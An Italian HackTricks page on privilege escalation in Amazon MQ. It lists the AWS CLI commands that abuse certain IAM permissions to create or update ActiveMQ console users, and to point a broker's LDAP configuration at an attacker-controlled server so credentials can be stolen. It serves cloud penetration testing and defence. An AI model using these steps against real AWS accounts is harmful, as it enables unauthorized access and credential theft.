AWS - MQ Privesc

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

MQ

Per ulteriori informazioni su MQ, controlla:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Con queste autorizzazioni puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impatto potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Con queste autorizzazioni puoi creare un nuovo utente in un broker ActimeMQ (questo non funziona in RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impatto potenziale: Accesso a informazioni sensibili navigando attraverso ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Se un broker utilizza LDAP per l'autorizzazione con ActiveMQ, è possibile cambiare la configurazione del server LDAP utilizzato in uno controllato dall'attaccante. In questo modo, l'attaccante sarà in grado di rubare tutte le credenziali inviate tramite LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Se riuscissi a trovare le credenziali originali utilizzate da ActiveMQ, potresti eseguire un attacco Man-in-the-Middle (MitM), rubare le credenziali, utilizzarle nel server originale e inviare la risposta (forse riutilizzando le credenziali rubate potresti farlo).

Impatto potenziale: Rubare le credenziali di ActiveMQ

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Last updated